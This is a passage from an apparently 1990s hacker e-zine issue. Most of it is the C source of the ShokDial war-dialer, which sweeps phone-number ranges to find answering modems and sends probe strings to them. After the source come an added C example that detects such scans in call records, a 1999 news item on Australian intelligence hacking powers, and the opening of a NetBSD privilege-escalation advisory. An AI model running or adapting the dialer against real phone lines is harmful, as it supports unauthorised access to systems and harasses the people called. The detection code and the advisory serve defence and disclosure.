else if ((strstr(buf, "BUSY")) != NULL) busy++;

/* Compare the string with "CONNECT" */
if (connected == 1) { /* Sighandler sets this to 0 when */
/* it's called...meaning time out. */
#ifdef BEEP
putchar('\a');
#endif

connect++;

fprintf(logfile, "*** CONNECT *** to %d-%.4d\n",
First3Digits, ScanMin);

printf("%s*** %sCONNECT %s%s*** %s to %s%d-%.4d%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
PINK, First3Digits, ScanMin, NORMAL);

/* Send a string to the carrier and check for response */
if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, strlen(sendstring)) == ERROR) { /* Send the string, not the whole buffer */
perror("write");

close(fd);
fclose(logfile);
exit(ERROR);
}

response = 1; /* Sighandler will set this to 0 when it */
/* times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
} else if (listen) { /* listen = 1, send = 0 */

response = 1; /* The sighandler will set this to 0 if it */
/* times out */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();

if (rand != 1) {
/* Increase ScanMin so it scans for the next number */
ScanMin++;

if (ScanMin > ScanMax) {
/* If they are different...then they are scanning */
/* something like: 555-XXXX through 556-XXXX. */

/* So now we reset everything. */

/*
* If you did: 755-XXXX through 757-XXXX, we need to
* increase the 755 and repeat until they are the same.
*/


if (First3Digits != First3Digits1) {

First3Digits++;
ScanMin = ScanMin1; /* Restored ScanMin to its */
/* original value. */
continue;
}

memset(buf, 0, sizeof(buf));

#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "\nFinished scanning %d-%.4d through %d-%.4d.\n",
First3Digits, ScanMin1, First3Digits, ScanMax);

memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Finished at/on: %s", date);
fflush(logfile);

printf("Finished scanning %s%d-%.4d %sthrough %s%d-%.4d%s.\n",
BOLDCYAN, First3Digits, ScanMin1, NORMAL,
BOLDCYAN, First3Digits, ScanMax, NORMAL);

/* Print statistics. */
printf("%sResults%s:\n", BOLDRED, NORMAL);

printf("\t# of %ssuccessful connects%s: %s%d%s\n",
BOLDCYAN, NORMAL, PINK, connect, NORMAL);

printf("\t# of lines %sbusy%s: %s%d%s\n",
YELLOW, NORMAL, PINK, busy, NORMAL);

printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
BOLDGREEN, NORMAL, PINK, noresponse, NORMAL);


printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW,
BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

break; /* Leave the scanning loop so the log file is closed below */
}
}

memset(phonenum, 0, sizeof(phonenum));

}
} else { /* (Long Distance call) */

memset(buf, 0, sizeof(buf));

fprintf(logfile, "Scanning long distance numbers...\n");
fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT);
fprintf(logfile, "Started scanning with 1-%.3d-%.3d-%.4d\n\n",
First3Digits, Last3Digits, ScanMin);

fflush(logfile);

while(1) {
if (rand == 1) ScanMin = (random() % 8889) + 1111;

printf("Dialing %s1-%.3d-%.3d-%.4d%s...\n",
PINK, First3Digits, Last3Digits, ScanMin, NORMAL);

memset(phonenum, 0, sizeof(phonenum));
sprintf(phonenum, "ATDT1%.3d%.3d%.4d\r",
First3Digits, Last3Digits, ScanMin);

numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout. */

sig = 0;
connected = 1; /*
* Easier to say it's connected and then
* set it to 0 if it's not than vice versa.
*/

do {
numbytes = read(fd, buf, 511);
if (sig == 1) break;
} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0);

if (connected == 0) noresponse++;
else if ((strstr(buf, "BUSY")) != NULL) busy++;

if (connected == 1) { /* The sighandler sets this to 0 when */
/* it gets called. */

#ifdef BEEP
putchar('\a');
#endif

connect++;

fprintf(logfile, "*** CONNECT *** to 1-%.3d-%.3d-%.4d\n",
First3Digits, Last3Digits, ScanMin);
fflush(logfile);

printf("%s*** %sCONNECT %s%s*** %sto %s1-%.3d-%.3d-%.4d%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK,
First3Digits, Last3Digits, ScanMin, NORMAL);

/* Send a string to the carrier and check for response */
if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, strlen(sendstring)) == ERROR) { /* Send the string, not the whole buffer */
perror("write");

close(fd);
fclose(logfile);
exit(ERROR);
}

response = 1; /* The sighandler sets this to 0 if it */
/* times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}

} else if (listen) { /* listen = 1, send = 0 */

response = 1; /* The sighandler sets this to 0 if it */
/* times out. */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();

if (rand != 1) {

/* Increase ScanMin so it scans for the next number */
ScanMin++;

if (ScanMin > ScanMax) {

/* If they are different...then they are scanning */
/* something like: 555-XXXX through 556-XXXX. */

/* So now we reset everything. */

/*
* If you did: 555-755-XXXX through
* 555-757-XXXX, we need to increase
* the 755 and repeat until they are the
* same.
*/


if ((First3Digits != First3Digits1)
|| (Last3Digits != Last3Digits1)) {

if (First3Digits != First3Digits1) First3Digits++;
if (Last3Digits != Last3Digits1) Last3Digits++;

ScanMin = ScanMin1; /* Restore to its original value */
continue;
}

memset(buf, 0, sizeof(buf));

#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "\nFinished scanning 1-%.3d-%.3d-%.4d through 1-%.3d-%.3d-%.4d.\n",
First3Digits, Last3Digits, ScanMin1, First3Digits,
Last3Digits, ScanMax);

memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Finished at/on: %s", date);
fflush(logfile);

printf("Finished scanning %s1-%.3d-%.3d-%.4d%s through %s1-%.3d-%.3d-%.4d%s.\n",
BOLDCYAN, First3Digits, Last3Digits, ScanMin1,
NORMAL, BOLDCYAN, First3Digits, Last3Digits,
ScanMax, NORMAL);

/* Print statistics. */
printf("%sResults%s:\n", BOLDRED, NORMAL);

printf("\t# of %ssuccessful connects%s: %s%d%s\n",
BOLDCYAN, NORMAL, PINK, connect, NORMAL);

printf("\t# of lines %sbusy%s: %s%d%s\n",
YELLOW, NORMAL, PINK, busy, NORMAL);

printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
BOLDGREEN, NORMAL, PINK, noresponse, NORMAL);


printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW,
BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);


break;
}
}

memset(phonenum, 0, sizeof(phonenum));
}
}

fclose(logfile);
}
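The scanning loops in dial_number() above place one short call after another, waiting TIMEOUT seconds for a CONNECT before moving to the next number. Seen from the other side, on the telephone switch or PBX, that pattern is distinctive: a single calling number placing many brief calls to numerically adjacent numbers (sequential mode) or to many numbers under one prefix (random mode) within a few minutes. The following C program is an added example, not part of ShokDial or of this issue; it runs over constructed call detail record (CDR) lines of the form caller,callee,epoch, and the window and thresholds (WINDOW_SECS, SEQ_THRESH, PFX_THRESH) are hypothetical values a site would tune against its own traffic.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_CALLS   256
#define WINDOW_SECS 600 /* hypothetical: seconds after a caller's first call to examine */
#define SEQ_THRESH  4   /* hypothetical: adjacent-number pairs that suggest a sequential scan */
#define PFX_THRESH  6   /* hypothetical: distinct numbers in one prefix that suggest a random scan */

struct call {
    char caller[16]; /* calling party as recorded in the CDR */
    long callee;     /* dialed number as an integer, e.g. 5551234 */
    long when;       /* epoch seconds */
};

/* Constructed sample CDR lines, "caller,callee,epoch": the first caller walks
 * 555-1111 through 555-1116 at 45 s intervals, as the sequential loop above
 * would; the second places two unrelated calls. */
static const char *SAMPLE_CDR[] = {
    "5550100,5551111,1000", "5550100,5551112,1045", "5550100,5551113,1090",
    "5550100,5551114,1135", "5550100,5551115,1180", "5550100,5551116,1225",
    "5550199,5552000,1010", "5550199,5559876,1300", NULL
};

/* Parse one CDR line into *out; returns 0 on success, -1 if malformed. */
int parse_cdr(const char *line, struct call *out)
{
    return sscanf(line, "%15[^,],%ld,%ld", out->caller, &out->callee, &out->when) == 3 ? 0 : -1;
}

/* Load the constructed sample into calls[]; returns the number of records parsed. */
int load_sample(struct call *calls, int max)
{
    int n = 0, i;
    for (i = 0; SAMPLE_CDR[i] != NULL && n < max; i++)
        if (parse_cdr(SAMPLE_CDR[i], &calls[n]) == 0)
            n++;
    return n;
}

static int cmp_long(const void *a, const void *b)
{
    long x = *(const long *)a, y = *(const long *)b;
    return (x > y) - (x < y);
}

/* Sort the numbers one caller dialed within WINDOW_SECS of its first call.
 * A sequential sweep shows up as pairs differing by exactly 1; a random sweep
 * of one prefix shows up as many distinct numbers sharing callee / 10000.
 * Returns 1 if either count reaches its threshold and reports both counts. */
int looks_like_scan(const struct call *calls, int n, const char *caller,
                    int *adjacent_pairs, int *max_prefix_count)
{
    long nums[MAX_CALLS], start = -1;
    int k = 0, i, pairs = 0, run, best;

    for (i = 0; i < n; i++) /* earliest call by this caller */
        if (strcmp(calls[i].caller, caller) == 0 && (start < 0 || calls[i].when < start))
            start = calls[i].when;
    for (i = 0; i < n && k < MAX_CALLS; i++) /* its calls inside the window */
        if (strcmp(calls[i].caller, caller) == 0 && calls[i].when - start <= WINDOW_SECS)
            nums[k++] = calls[i].callee;
    qsort(nums, k, sizeof nums[0], cmp_long);

    run = best = (k > 0) ? 1 : 0;
    for (i = 1; i < k; i++) {
        if (nums[i] == nums[i - 1] + 1)
            pairs++;
        if (nums[i] / 10000 == nums[i - 1] / 10000)
            run += (nums[i] != nums[i - 1]); /* same prefix, distinct number */
        else
            run = 1;                          /* prefix changed: start a new run */
        if (run > best)
            best = run;
    }
    *adjacent_pairs = pairs;
    *max_prefix_count = best;
    return (pairs >= SEQ_THRESH || best >= PFX_THRESH) ? 1 : 0;
}

/* Run looks_like_scan() over the sample; which = 0 returns the verdict,
 * 1 the adjacent-pair count, 2 the largest same-prefix count. */
int sample_stat(const char *caller, int which)
{
    struct call calls[MAX_CALLS];
    int a, p, n = load_sample(calls, MAX_CALLS);
    int verdict = looks_like_scan(calls, n, caller, &a, &p);
    return which == 0 ? verdict : (which == 1 ? a : p);
}

int main(void)
{
    const char *callers[] = { "5550100", "5550199" };
    int i;
    for (i = 0; i < 2; i++)
        printf("%s: adjacent pairs=%d, same-prefix=%d -> %s\n", callers[i],
               sample_stat(callers[i], 1), sample_stat(callers[i], 2),
               sample_stat(callers[i], 0) ? "LIKELY SCAN" : "normal");
    return 0;
}
```

The window is anchored at the caller's first call for brevity; a production check would slide it across the day and would also weigh call duration, since a scan's calls end within a few seconds of the far end answering. On the sample, 5550100 is flagged with five adjacent pairs and six distinct numbers under prefix 555, while 5550199 is not.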

/* --------------------------------------- */

void confdial(char *confile)
{
time_t tm; /* Where our calendar time is stored */
FILE *logfile; /* For the log file */
FILE *confd; /* For the config file */
char date[32]; /* Contain time scanning started/stopped */
char pnum1[20]; /* Phone # without the '-'s and what not. */
char phonenum[20]; /* This will include the ATDT etc. */

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

fprintf(logfile, "\n----------------------\n\n");
fflush(logfile);

if ((confd = fopen(confile, "r")) == NULL) {
perror("fopen");
exit(ERROR);
}

memset(buf, 0, sizeof(buf));
memset(date, 0, sizeof(date));

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

printf("Reading phone numbers from \"%s%s%s\".\n", PINK, confile, NORMAL);

printf("\nNOTE: There is no checking of the phone number for -c or -S\n"
"to allow you to enter odd strings such as \"5551234,,,5#\".\n\n");

fprintf(logfile, "Started at/on: %s\n"
"Reading phone numbers from config file \"%s\".\n",
date, confile);

fflush(logfile);
memset(date, 0, sizeof(date));

if (daemon == 1) putchar('\n'); /* Just to make it look nicer */

printf("Using a %s%d%s second connection %stimeout%s.\n",
BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL);


memset(pnum1, 0, sizeof(pnum1));
memset(phonenum, 0, sizeof(phonenum));

while (fgets(pnum, sizeof(pnum), confd) != NULL) { /* Stop cleanly at end of file */

if (pnum[0] == '\n')
continue;

if ((strstr(pnum, "#")) != NULL) {

if (pnum[0] == '#')
continue;
else {
/* Well either there are some spaces, or a */
/* number before the comment */

char *p, *p1;
char temp[20];

memset(temp, 0, sizeof(temp));

p = pnum, p1 = temp;

while (*p == '\t' || *p == ' ')
p++; /* Advance past leading whitespace */

if (*p == '#') /* Just some space and a comment */
continue;
else { /* Okay it's a number */
/* Copy up to the next whitespace, newline or comment, */
/* and never past the end of temp. */
while (*p != '\t' && *p != ' ' && *p != '\n' &&
*p != '\0' && *p != '#' && p1 - temp < (int)sizeof(temp) - 1)
*p1++ = *p++;

sprintf(pnum, "%s", temp);

}
}

}

fprintf(logfile, "Dialing %s\n", pnum);
fflush(logfile);

strip(pnum, pnum1);

printf("Dialing %s%s%s\n", BOLDCYAN, pnum, NORMAL);

sprintf(phonenum, "ATDT%s\r", pnum1);

numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout */

sig = 0;
connected = 1; /*
* Easier to set it to 1 and then set it
* to 0 if it's not than vice versa
*/


do {
numbytes = read(fd, buf, 511);
if (sig == 1) break;
} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0); /* Stop the timing. */

/* Compare the string with "CONNECT" */
if (connected == 1) {
#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "*** CONNECT *** to %s", pnum);
printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
PINK, pnum, NORMAL);

/* Send a string to the carrier and check for response */
if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, strlen(sendstring)) == ERROR) { /* Send the string, not the whole buffer */
perror("write");
close(fd);
exit(ERROR);
}

response = 1; /* Sighandler will set this to 0 if it times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
} else if (listen) { /* listen = 1, send = 0 */

response = 1; /* The sighandler will set this to 0 if it */
/* times out */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();
}

#ifdef BEEP
putchar('\a');
#endif

memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Finished dialing at/on: %s", date);
fflush(logfile);

printf("Finished dialing!!\n");

printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

fclose(logfile);
return;
}

/* -------------------------------------- */

void inputdial()
{
time_t tm; /* Where our calendar time is stored */
FILE *logfile; /* For the log file */
char date[32]; /* Contain time scanning started/stopped */
char phonenum[20]; /* This will include the ATDT etc. */

/* Get location of numbers: local numbers or long distance numbers */

LorD:
printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ",
PINK, NORMAL, PINK, NORMAL);

while(1) {
LocalOrLong = getchar();

if (!isprint(LocalOrLong)) continue;
if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) {
printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n",
BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL, YELLOW,
NORMAL, YELLOW, NORMAL);
goto LorD; /* Reprint message. */
} else break;
}

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

fprintf(logfile, "\n----------------------\n\n");
fflush(logfile);

memset(buf, 0, sizeof(buf));
memset(date, 0, sizeof(date));

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "Started at/on: %s\n", date);
fprintf(logfile, "Reading phone numbers from stdin.\n");

fflush(logfile);
memset(date, 0, sizeof(date));

if (daemon == 1) putchar('\n'); /* Just to make it look nicer */

printf("Using a %s%d%s second connection %stimeout%s.\n",
BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL);

memset(phonenum, 0, sizeof(phonenum));

printf("When finished, enter \"%s.%s\" as the number.\n",
BOLDWHITE, NORMAL);

printf("\nNOTE: There is no checking of the phone number for -c or -S\n"
"to allow you to enter odd strings such as \"5551234,,,5#\".\n\n");

signal(SIGINT, sighandler);
signal(SIGTERM, sighandler);

while (1) {
if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */

printf("Enter phone number (i.e. 555-5555): ");
/* scanf() matches fewer than 2 fields when "." is entered, so stop then */
/* (a failed match leaves the variables untouched, it does not zero them) */
if (scanf("%3d%*c%4d", &First3Digits, &ScanMin) < 2) goto finished;

sprintf(pnum, "%.3d%.4d", First3Digits, ScanMin);

fprintf(logfile, "Dialing %.3d-%.4d\n", First3Digits, ScanMin);
fflush(logfile);

} else { /* LocalOrLong == 'D', use long distance phone numbers */

printf("Enter phone number (i.e. 555-555-5555): ");
/* scanf() matches fewer than 3 fields when "." is entered, so stop then */
/* (a failed match leaves the variables untouched, it does not zero them) */
if (scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin) < 3)
goto finished;

sprintf(pnum, "1%.3d%.3d%.4d", First3Digits, Last3Digits, ScanMin);

fprintf(logfile, "Dialing %.3d-%.3d-%.4d\n",
First3Digits, Last3Digits, ScanMin);
fflush(logfile);
}

sprintf(phonenum, "ATDT%s\r", pnum);
numbytes = write(fd, phonenum, strlen(phonenum));
check_for_error(LogFile, fd, numbytes, "write");

memset(buf, 0, sizeof(buf));

alarm(TIMEOUT); /* How long to wait for timeout */

sig = 0;
connected = 1; /*
* Easier to set it to 1 and then set it
* to 0 if it's not than vice versa
*/


do {
numbytes = read(fd, buf, 511);
if (sig == 1) break;
} while ((strstr(buf, "CONNECT")) == NULL);

alarm(0); /* Stop the timing. */

/* Compare the string with "CONNECT" */
if (connected == 1) {
#ifdef BEEP
putchar('\a');
#endif

fprintf(logfile, "*** CONNECT *** to %s", pnum);
printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n",
BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL,
PINK, pnum, NORMAL);

if (send && listen) { /* send poke string and listen for reply */

if (write(fd, sendstring, strlen(sendstring)) == ERROR) { /* Send the string, not the whole buffer */
perror("write");
close(fd);
exit(ERROR);
}

response = 1; /* The sighandler returns 0 when it times out */

printf("response from carrier (after sending string): ");
fprintf(logfile, "response from carrier (after sending string): ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
} else if (listen) { /* listen = 1, send = 0 */

response = 1; /* The sighandler will set this to 0 if it */
/* times out */

printf("response from carrier: ");
fprintf(logfile, "response from carrier: ");
fflush(stdout), fflush(logfile);

if (read(fd, buf, sizeof(buf)) == ERROR) {
perror("read");
printf("continuing anyway...\n");
}

if (response == 1) {
printf("%s\n", buf);
fprintf(logfile, "%s\n", buf);
} else {
printf("timed out while waiting for response\n");
fprintf(logfile, "timed out while waiting for response\n");
}
}
}

memset(buf, 0, sizeof(buf));

hangup();
}


finished:
memset(date, 0, sizeof(date));
tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

fprintf(logfile, "User ended dialing at/on: %s", date);
fflush(logfile);

printf("Okay I hope you enjoyed it!\n");

printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n",
BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE,
BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL);

fclose(logfile);
return;
}

/* -------------------------------------- */

void hangup()
{
FILE *logfile;

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

/*
* The reason we write "ATH" to a nonconnected host is that
* this is fine. But when it's connected... +++ is sent as
* the login name, and ATH as the password (not a good thing
* to be logged on a remote host anyway. ;)
* If it is connected we will take the less efficient method
* of closing and reopening the fd to hang up
*/


if (connected != 1) {
numbytes = write(fd, "+++\r", 4);
check_for_error(LogFile, fd, numbytes, "write");

usleep(500000);
memset(buf, 0, sizeof(buf));

numbytes = write(fd, "ATH0\r", 5);
check_for_error(LogFile, fd, numbytes, "write");


/*
* We're using SIGALRM, and sleep() uses sig alarm
* and usleep() doesn't.
*/


usleep(1000000);

numbytes = read(fd, buf, sizeof(buf));
check_for_error(LogFile, fd, numbytes, "read");
usleep(2000000);

noOK = checkok(LogFile, fd, buf, "hanging up modem");

if (noOK == 1) {
/* There was an error getting an "OK" from the modem */
fclose(logfile);
close(fd), exit(ERROR);
}

} else {
if (close(fd) == ERROR) {
perror("close");
exit(ERROR);
}

open_port();
connected = 0;
}

memset(buf, 0, sizeof(buf));
fclose(logfile);
}

/* -------------------------------------- */

/* The reason I have two different sighandler functions, rather than */
/* just basing off the signal number, is simplicity. */


void sighandler(int signum)
{
FILE *logfile;
char date[32]; /* Where the date for the ending time is stored. */
time_t tm; /* Where calendar time is stored. */

memset(date, 0, sizeof(date));

/* Just exit on one of these signals. */
signal(SIGINT, stopnow);
signal(SIGTERM, stopnow);

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

printf("%sReceived signal to quit%s:\nClosing up modem, logging, and exiting.\n",
BOLDRED, NORMAL);
fprintf(logfile, "\nReceived signal to quit. Aborting.\n");
fflush(logfile);

if (conf == 1) {
fprintf(logfile, "Last number dialed was %s", pnum);
close(fd);
fclose(logfile);
exit(ERROR);
}

if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */
if (rand != 1 || conf != 1) {
fprintf(logfile, "Last number dialed was %.3d-%.4d.\n",
First3Digits, ScanMin);

printf("Last number dialed was %s%.3d-%.4d%s.\n",
BOLDCYAN, First3Digits, ScanMin, NORMAL);
}
} else { /* if LocalOrLong == 'D' */
if (rand != 1 || conf != 1) {
fprintf(logfile, "Last number dialed was 1-%.3d-%.3d-%.4d.\n",
First3Digits, Last3Digits, ScanMin);

printf("Last number dialed was %s1-%.3d-%.3d-%.4d%s.\n",
BOLDCYAN, First3Digits, Last3Digits, ScanMin, NORMAL);
}
}

/* The result counters are the same in both modes, so log them once. */
fprintf(logfile, "Results:\n");
fprintf(logfile, "\t# of successful connects: %d\n", connect);
fprintf(logfile, "\t# of busy numbers: %d\n", busy);
fprintf(logfile, "\t# of no responses (timed out): %d\n", noresponse);


/* Print statistics. */
printf("%sResults%s:\n", BOLDRED, NORMAL);

printf("\t# of %ssuccessful connects%s: %s%d%s\n",
BOLDCYAN, NORMAL, PINK, connect, NORMAL);

/* This line printed the "no responses" label against the busy counter. */
printf("\t# of %sbusy numbers%s: %s%d%s\n",
YELLOW, NORMAL, PINK, busy, NORMAL);

printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
BOLDGREEN, NORMAL, PINK, noresponse, NORMAL);


fprintf(logfile, "Aborted at: %s", date);
fflush(logfile);

noshow = 1; /* So we don't get 'Opening modem for dialing' because */
/* we use open_port() for both hanging up and dialing. */

hangup();

close(fd);
fclose(logfile);

exit(0);
}

/* -------------------------------------- */

void sighandler1(int signum)
{
signal(SIGALRM, sighandler1);

sig = 1;
response = 0;
connected = 0;
}

/* -------------------------------------- */

void menu(int signum)
{
int ch; /* getchar() returns int so that EOF (negative) can be told apart */

signal(SIGINT, sighandler);
signal(SIGTERM, sighandler);

printf("\n\n1. Hang up modem and skip to next number\n");
printf("2. Hang up modem and exit\n\n");
printf("Enter 1 or 2: ");

while (1) {
fflush(stdout);

ch = getchar();
if (ch == EOF) sighandler(0); /* stdin gone: treat it as "hang up and exit" */

if (ch == '1') {

alarm(0); /* Stop the timeout timer. */

/* Just act like the number timed out. sighandler1 is */
/* the sig handler called when a number times out. */
sighandler1(0);

/* Reset signal handlers. */
signal(SIGINT, menu);
signal(SIGTERM, menu);

break;
} else if (ch == '2') {
/* Sig handler used to exit. So we will just call this. */
sighandler(0);

} else
if (isprint(ch)) printf("Invalid option.\nEnter 1 or 2: ");
}
}

void stopnow(int signum)
{
/* Exit immediately. */
exit(ERROR);
}


20.0 Australia gears up security for olympics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Australia Proposes Intelligence Service Hacking Powers

CANBERRA, AUSTRALIA, 1999 MAR 25
(Newsbytes) -- By Adam Creed, Newsbytes.
Australia's internal security service, the Australian Security Intelligence Organisation (ASIO),
is set to get increased powers to hack into computers, copy files and alter software on
computers in Australia as it conducts the country's largest ever intelligence operation
in the run up to the Sydney 2000 Olympics.

Federal Attorney-General Daryl Williams Thursday introduced into the House of
Representatives the first amendments to the ASIO Act in 20 years. The amendments, if
passed by Parliament would give the intelligence-gathering service the freedom to
access information on the computers and networks of Australian companies and
individuals.

Williams claimed the amendments were not in response to the security challenges posed
by one event, the Olympics, but through a need to have free access to new sources of
intelligence in the information age.

The ASIO Legislation Amendment Bill 1999 will permit security officers to hack into a
computer if "there are reasonable grounds for believing that access to data held in a
particular computer (the target computer) will substantially assist the collection of
intelligence that is important in relation to security".

An access warrant permits ASIO to use computers, phone companies and
telecommunications equipment to gain access to a remote or networked computer.
Once in, the ASIO hackers will be allowed to copy, add, delete or alter any data in the
target computer that is relevant to the security matter.

When they leave security officers will be allowed to cover up the fact that they hacked
into the system and will not be subject to the Crimes Act which forbids computer hacking
in Australia.

Although Williams asserts the expanded powers are not in preparation for the 2000
Olympics solely, the role of ASIO during the Olympics has been discussed for over a
year.

A 1998 Australian National Audit Office (ANAO) report assessing the adequacy of
planned responsibilities and preparations for security during the Olympic games speaks
of the new challenges faced by ASIO as it draws on new sources of information both
domestically and overseas.

"The Olympics represent a task well beyond the normal scope of intelligence activities,
particularly as it will extend to areas outside the usual focus for Australia's security
interests,"
read the report, describing how organizational structures for Olympic
intelligence operations closely mirrored the arrangements for "coordinating threat
assessments and activities related to terrorism."


During the Olympics ASIO will be expected to collect and disseminate intelligence
information. Interestingly, at the time of the report, the use of the Internet for
intelligence-gathering and monitoring in conjunction with intelligence from overseas
allies (the US and UK) was also discussed.

"Access to open source material, e.g. Internet and media, may also be used to
supplement other material,"
said the report, talking about online monitoring, search
engine use and filters. It went on to note problems with this approach caused by the
huge amount of resources needed and the potential for disinformation.

The Australian Security Intelligence Organisation Legislation Amendment Bill
1999 can be found on the World Wide Web at
http://www.aph.gov.au/parlinfo/billsnet/bills.htm
and the ANAO audit of Olympic security preparations is in PDF format at
http://www.anao.gov.au/rptsfull_99/audrpt5/rpt5-99.pdf

Reported By Newsbytes News Network,
http://www.newsbytes.com


@HWA

21.0 NetBSD security advisories: umapfs and noexec mount flag
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NetBSD Security Advisory 1999-006
=================================

Topic: Security hole in umapfs
Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990312
Severity: Local users can gain root privileges


Abstract
========

Insufficient kernel checking in the umapfs virtual file system allows
local users to remap their user id to any other user including the root
user.

umapfs is enabled in the default (GENERIC) kernel for the following ports:
